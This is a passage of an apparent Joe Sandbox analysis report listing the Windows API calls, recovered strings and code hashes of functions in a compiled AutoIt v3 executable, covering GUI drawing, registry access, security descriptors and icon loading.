                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveType
                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                      • API String ID: 2907320926-4222207086
                                                                                      • Opcode ID: 7575b302da5184886cf5d4c71e8b9ade92c63085917ff87d3462bf2734813e5d
                                                                                      • Instruction ID: 3deffb1f39202e7161e36c2d0435b6debddd5299b1dadc7fd2ea00d573e44cad
                                                                                      • Opcode Fuzzy Hash: 7575b302da5184886cf5d4c71e8b9ade92c63085917ff87d3462bf2734813e5d
                                                                                      • Instruction Fuzzy Hash: 9F61B030705207DBCB08FF25CA819BDB7B5AB45308B248426F916AB791DB71EE41EB49
                                                                                      APIs
                                                                                      • GetSysColor.USER32(00000012), ref: 00CA7421
                                                                                      • SetTextColor.GDI32(?,?), ref: 00CA7425
                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00CA743B
                                                                                      • GetSysColor.USER32(0000000F), ref: 00CA7446
                                                                                      • CreateSolidBrush.GDI32(?), ref: 00CA744B
                                                                                      • GetSysColor.USER32(00000011), ref: 00CA7463
                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CA7471
                                                                                      • SelectObject.GDI32(?,00000000), ref: 00CA7482
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00CA748B
                                                                                      • SelectObject.GDI32(?,?), ref: 00CA7498
                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00CA74B7
                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CA74CE
                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CA74DB
                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CA752A
                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CA7554
                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00CA7572
                                                                                      • DrawFocusRect.USER32(?,?), ref: 00CA757D
                                                                                      • GetSysColor.USER32(00000011), ref: 00CA758E
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00CA7596
                                                                                      • DrawTextW.USER32(?,00CA70F5,000000FF,?,00000000), ref: 00CA75A8
                                                                                      • SelectObject.GDI32(?,?), ref: 00CA75BF
                                                                                      • DeleteObject.GDI32(?), ref: 00CA75CA
                                                                                      • SelectObject.GDI32(?,?), ref: 00CA75D0
                                                                                      • DeleteObject.GDI32(?), ref: 00CA75D5
                                                                                      • SetTextColor.GDI32(?,?), ref: 00CA75DB
                                                                                      • SetBkColor.GDI32(?,?), ref: 00CA75E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                      • String ID:
                                                                                      • API String ID: 1996641542-0
                                                                                      • Opcode ID: f48c493b3e121a2ca9b89777acaa99adae78b7e921cf6acf6af63e0e48bd49fa
                                                                                      • Instruction ID: 473ee47aa2a1b511768ca825ac890939da090013599805de6514dcbf9cbe9347
                                                                                      • Opcode Fuzzy Hash: f48c493b3e121a2ca9b89777acaa99adae78b7e921cf6acf6af63e0e48bd49fa
                                                                                      • Instruction Fuzzy Hash: 85615172D04219AFDB019FA4DC49BDE7FB9FB0A324F114125FA15A72A1D7709940DF90
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00CA1128
                                                                                      • GetDesktopWindow.USER32 ref: 00CA113D
                                                                                      • GetWindowRect.USER32(00000000), ref: 00CA1144
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA1199
                                                                                      • DestroyWindow.USER32(?), ref: 00CA11B9
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CA11ED
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA120B
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA121D
                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00CA1232
                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00CA1245
                                                                                      • IsWindowVisible.USER32(00000000), ref: 00CA12A1
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00CA12BC
                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00CA12D0
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00CA12E8
                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00CA130E
                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00CA1328
                                                                                      • CopyRect.USER32(?,?), ref: 00CA133F
                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00CA13AA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                      • String ID: ($0$tooltips_class32
                                                                                      • API String ID: 698492251-4156429822
                                                                                      • Opcode ID: f151216f7176fec2266e9f7e5717ec91a6084737bf69819f1f8c394831d0f28a
                                                                                      • Instruction ID: 01c94dd985fbad93a4d2b98f6737169a776292fd5b43b44fa0cc6fdc284c0cc7
                                                                                      • Opcode Fuzzy Hash: f151216f7176fec2266e9f7e5717ec91a6084737bf69819f1f8c394831d0f28a
                                                                                      • Instruction Fuzzy Hash: A6B1AD71608342AFDB10DF64C884BAEBBE4FF86358F048918F9999B261C731EC45DB91
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00CA02E5
                                                                                      • _wcslen.LIBCMT ref: 00CA031F
                                                                                      • _wcslen.LIBCMT ref: 00CA0389
                                                                                      • _wcslen.LIBCMT ref: 00CA03F1
                                                                                      • _wcslen.LIBCMT ref: 00CA0475
                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CA04C5
                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CA0504
                                                                                        • Part of subcall function 00C2F9F2: _wcslen.LIBCMT ref: 00C2F9FD
                                                                                        • Part of subcall function 00C7223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C72258
                                                                                        • Part of subcall function 00C7223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C7228A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                      • API String ID: 1103490817-719923060
                                                                                      • Opcode ID: e975b82b9b9445e00f0966817c11d6079142773816aac0ebd2f0b4eb39aab4e0
                                                                                      • Instruction ID: 50eb709ac88ae6304268bdb91c0490f6eb821d0a2c30ae79e94ecc0616ae472d
                                                                                      • Opcode Fuzzy Hash: e975b82b9b9445e00f0966817c11d6079142773816aac0ebd2f0b4eb39aab4e0
                                                                                      • Instruction Fuzzy Hash: AEE191312182028FCB14DF24C45196EB7E6BFCA358F644A6DF8969B3A1D730EE46DB41
                                                                                      APIs
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C28968
                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00C28970
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C2899B
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00C289A3
                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00C289C8
                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C289E5
                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C289F5
                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C28A28
                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C28A3C
                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00C28A5A
                                                                                      • GetStockObject.GDI32(00000011), ref: 00C28A76
                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C28A81
                                                                                        • Part of subcall function 00C2912D: GetCursorPos.USER32(?), ref: 00C29141
                                                                                        • Part of subcall function 00C2912D: ScreenToClient.USER32(00000000,?), ref: 00C2915E
                                                                                        • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000001), ref: 00C29183
                                                                                        • Part of subcall function 00C2912D: GetAsyncKeyState.USER32(00000002), ref: 00C2919D
                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00C290FC), ref: 00C28AA8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                      • String ID: AutoIt v3 GUI
                                                                                      • API String ID: 1458621304-248962490
                                                                                      • Opcode ID: 216dff8952466c0bf99246b1f4652223b7e78c792f8fa6da49d33e170daf643c
                                                                                      • Instruction ID: fdeb915b3375add4de256f22df95b1081f7364a6fa61dc1be5b67e374744cd1d
                                                                                      • Opcode Fuzzy Hash: 216dff8952466c0bf99246b1f4652223b7e78c792f8fa6da49d33e170daf643c
                                                                                      • Instruction Fuzzy Hash: 62B19B75A0021A9FDF24DFA8DD85BAE3BB5FB48314F154229FA15AB2D0DB34E940CB50
                                                                                      APIs
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71114
                                                                                        • Part of subcall function 00C710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71120
                                                                                        • Part of subcall function 00C710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C7112F
                                                                                        • Part of subcall function 00C710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C70B9B,?,?,?), ref: 00C71136
                                                                                        • Part of subcall function 00C710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C7114D
                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C70DF5
                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C70E29
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70E40
                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C70E7A
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C70E96
                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C70EAD
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C70EB5
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C70EBC
                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C70EDD
                                                                                      • CopySid.ADVAPI32(00000000), ref: 00C70EE4
                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C70F13
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C70F35
                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C70F47
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70F6E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70F75
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70F7E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70F85
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C70F8E
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70F95
                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C70FA1
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C70FA8
                                                                                        • Part of subcall function 00C71193: GetProcessHeap.KERNEL32(00000008,00C70BB1,?,00000000,?,00C70BB1,?), ref: 00C711A1
                                                                                        • Part of subcall function 00C71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C70BB1,?), ref: 00C711A8
                                                                                        • Part of subcall function 00C71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C70BB1,?), ref: 00C711B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: 7f5bb584b72fef82ec10573a069492f0917c533908a339dc98a5c02ca1ac5fcc
                                                                                      • Instruction ID: 2844660dddd7b29a36d6e20d3af79d3c051397fe4af869a22a18e3fa1760dd32
                                                                                      • Opcode Fuzzy Hash: 7f5bb584b72fef82ec10573a069492f0917c533908a339dc98a5c02ca1ac5fcc
                                                                                      • Instruction Fuzzy Hash: E2715B72A0020AEBDF20DFA4DC85FAEBBB8BF05304F148115F969E7191D7719A15CB60
                                                                                      APIs
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C4BD
                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CACC08,00000000,?,00000000,?,?), ref: 00C9C544
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C9C5A4
                                                                                      • _wcslen.LIBCMT ref: 00C9C5F4
                                                                                      • _wcslen.LIBCMT ref: 00C9C66F
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C9C6B2
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C9C7C1
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C9C84D
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C9C881
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C9C88E
                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C9C960
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                      • API String ID: 9721498-966354055
                                                                                      • Opcode ID: 07cd5e02ace7219de7f82ac0031aad71ecf624e9016cf8474905847b633e3731
                                                                                      • Instruction ID: aef9daaf552421f2b8e7ee10ab3f11d36551ef1073dbe0d3a4f0dc8ee3c0c4df
                                                                                      • Opcode Fuzzy Hash: 07cd5e02ace7219de7f82ac0031aad71ecf624e9016cf8474905847b633e3731
                                                                                      • Instruction Fuzzy Hash: EC1278312042019FDB14DF14C895B6AB7E5EF89714F05899CF89A9B3A2DB31FD41EB81
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00CA09C6
                                                                                      • _wcslen.LIBCMT ref: 00CA0A01
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA0A54
                                                                                      • _wcslen.LIBCMT ref: 00CA0A8A
                                                                                      • _wcslen.LIBCMT ref: 00CA0B06
                                                                                      • _wcslen.LIBCMT ref: 00CA0B81
                                                                                        • Part of subcall function 00C2F9F2: _wcslen.LIBCMT ref: 00C2F9FD
                                                                                        • Part of subcall function 00C72BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C72BFA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                      • API String ID: 1103490817-4258414348
                                                                                      • Opcode ID: 02787938357308798475753ab6d8d9cc38043b05b44ca0f5edcfa98d1b81755f
                                                                                      • Instruction ID: 93c145f0e6eb6e7cc42f9fee53d24bd75a92f64f1bd70dd73ff55337d7f67e74
                                                                                      • Opcode Fuzzy Hash: 02787938357308798475753ab6d8d9cc38043b05b44ca0f5edcfa98d1b81755f
                                                                                      • Instruction Fuzzy Hash: C8E1B0312083028FC714DF25C45096AB7E2FF9A358F248A5DF8A69B362D731EE45DB81
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                      • API String ID: 1256254125-909552448
                                                                                      • Opcode ID: f59425fb1c330587880c34c170adf3104843c9871ec1bef43117db06200bb7f9
                                                                                      • Instruction ID: efce02abb90c35067623be1112106340a05f58c833c9bb3c8481aa2313e101af
                                                                                      • Opcode Fuzzy Hash: f59425fb1c330587880c34c170adf3104843c9871ec1bef43117db06200bb7f9
                                                                                      • Instruction Fuzzy Hash: DA71053260016A8BCF20DE78CDD56BE3395AB61764F150629F87697284FA30CF81E3A0
                                                                                      APIs
                                                                                      • _wcslen.LIBCMT ref: 00CA835A
                                                                                      • _wcslen.LIBCMT ref: 00CA836E
                                                                                      • _wcslen.LIBCMT ref: 00CA8391
                                                                                      • _wcslen.LIBCMT ref: 00CA83B4
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CA83F2
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CA5BF2), ref: 00CA844E
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8487
                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CA84CA
                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8501
                                                                                      • FreeLibrary.KERNEL32(?), ref: 00CA850D
                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CA851D
                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00CA5BF2), ref: 00CA852C
                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CA8549
                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CA8555
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                      • String ID: .dll$.exe$.icl
                                                                                      • API String ID: 799131459-1154884017
                                                                                      • Opcode ID: 591b6666dbd1993e9106271b20b004e3d433ad4220c5ab75c0912026f7e9f756
                                                                                      • Instruction ID: 320cb0206bb972ff8fbc0009d0e9566b97cb1d4d7336b6c1928f58978f05b749
                                                                                      • Opcode Fuzzy Hash: 591b6666dbd1993e9106271b20b004e3d433ad4220c5ab75c0912026f7e9f756
                                                                                      • Instruction Fuzzy Hash: 9B61027190020ABFEB14DF64CC85BBE77ACBF0A724F104609F825D61D0EB74AA84D7A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                      • API String ID: 0-1645009161
                                                                                      • Opcode ID: c96eac2ef1706ef02e35d279013339fcc262d17400e2c6e62110601a6316122f
                                                                                      • Instruction ID: df10d9ed2b38cd7402120ea73c2faa75a8f3f6ca9b364e49252391cd844681c5
                                                                                      • Opcode Fuzzy Hash: c96eac2ef1706ef02e35d279013339fcc262d17400e2c6e62110601a6316122f
                                                                                      • Instruction Fuzzy Hash: 6F810575600605ABDB21AF61DC52FEF3BB8AF16304F044024FD05AA2D2EB70DA95E7E5
                                                                                      APIs
                                                                                      • LoadIconW.USER32(00000063), ref: 00C75A2E
                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C75A40
                                                                                      • SetWindowTextW.USER32(?,?), ref: 00C75A57
                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C75A6C
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C75A72
                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C75A82
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C75A88
                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C75AA9
